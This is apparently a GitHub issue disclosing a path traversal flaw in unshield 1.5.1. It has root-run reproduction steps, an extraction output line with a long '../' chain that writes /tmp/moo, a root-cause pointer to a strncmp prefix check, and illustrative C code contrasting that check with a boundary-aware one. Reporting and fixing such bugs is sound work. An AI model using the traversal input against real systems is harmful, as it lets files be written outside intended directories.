Path traversal bug in src/unshield.c

Open eqawasm opened this issue 1 year ago • 1 comment

Impact:

The latest version 1.5.1 has a path traversal vulnerability with root permission that allows the attacker to create or write to files outside the current directory due to improper string comparisons between real paths.

How to reproduce:

$ wget https://github.com/twogood/unshield/archive/refs/tags/1.5.1.tar.gz
$ tar -xzf 1.5.1.tar.gz
$ cd unshield-1.5.1
$ cmake .
$ make
$ make install
# download cab and hdr files from https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=776193 
# must be located together in the same directory  
$ cd /
$ sudo mkdir tm
$ cd tm
$ ls /tmp/moo
  ls: cannot access /tmp/moo: No such file or directory

$ sudo /home/path/to/unshield-1.5.1/src/unshield x /path/to/data1.cab
     Cabinet: data1.cab
       extracting: ./Bovine_Files/../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/moo
     --------  -------
          1 files

# verify attack worked
$ ls /tmp/moo
  /tmp/moo

Root cause:

https://github.com/twogood/unshield/blob/67bca739edfdb5468412a073b08541dc4c19747c/src/unshield.c#L494-L506

The root cause is that the return value of the strncmp call in src/unshield.c passes the if condition in function extract_file.

PoC image:

download data1.cab and data1.hdr from https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=776193

eqawasm avatar May 16 '23 00:05 eqawasm
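The report above describes a prefix comparison between two realpath() results that lets "/tm" match "/tmp/moo". The following is an added illustration written for this page, not unshield's own source: it assumes the check compares already-resolved absolute paths with a plain `strncmp` over the length of the output directory, and places a boundary-aware check next to it. The function names `naive_prefix_check` and `is_within_base` and the sample paths are constructed for the example.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Both functions take paths in the form realpath(3) returns them: absolute,
 * no "." or ".." components, no trailing slash except for "/" itself.
 * Constructed example code; it is not the unshield project's own source. */

/* The flawed pattern: a bare prefix comparison over strlen(base).
 * "/tm" is a string prefix of "/tmp/moo", so a target that resolves to
 * /tmp/moo is accepted when the output directory is /tm. */
bool naive_prefix_check(const char *base, const char *target)
{
    return strncmp(base, target, strlen(base)) == 0;
}

/* Boundary-aware check: after the prefix matches, the next character of
 * the target must be a path separator or the end of the string, so the
 * match ends on a whole path component. The root directory "/" already
 * ends with the separator and is handled explicitly. */
bool is_within_base(const char *base, const char *target)
{
    size_t blen = strlen(base);

    if (blen == 0 || base[0] != '/' || target[0] != '/')
        return false;                       /* require absolute paths */
    if (strcmp(base, "/") == 0)
        return true;                        /* everything resolves under root */
    if (strncmp(base, target, blen) != 0)
        return false;                       /* not even a string prefix */
    return target[blen] == '\0' || target[blen] == '/';
}

int main(void)
{
    const char *base = "/tm";               /* constructed sample output directory */
    const char *cases[] = {
        "/tm/Bovine_Files/a.txt",           /* legitimate extraction target */
        "/tmp/moo",                         /* the path from the report */
        "/tm",                              /* the base itself */
        "/tmx"                              /* sibling directory sharing a prefix */
    };

    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++) {
        printf("%-24s naive=%d boundary-aware=%d\n", cases[i],
               naive_prefix_check(base, cases[i]),
               is_within_base(base, cases[i]));
    }
    return 0;
}
```

Running the block prints one line per sample path; the "/tmp/moo" line is the one where the two checks disagree. In a real extractor the check still has to run on realpath() output after the destination's parent directory exists, since a lexical check on the unresolved archive name would miss symlinks.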

Thanks! PR is welcome!

twogood avatar May 16 '23 05:05 twogood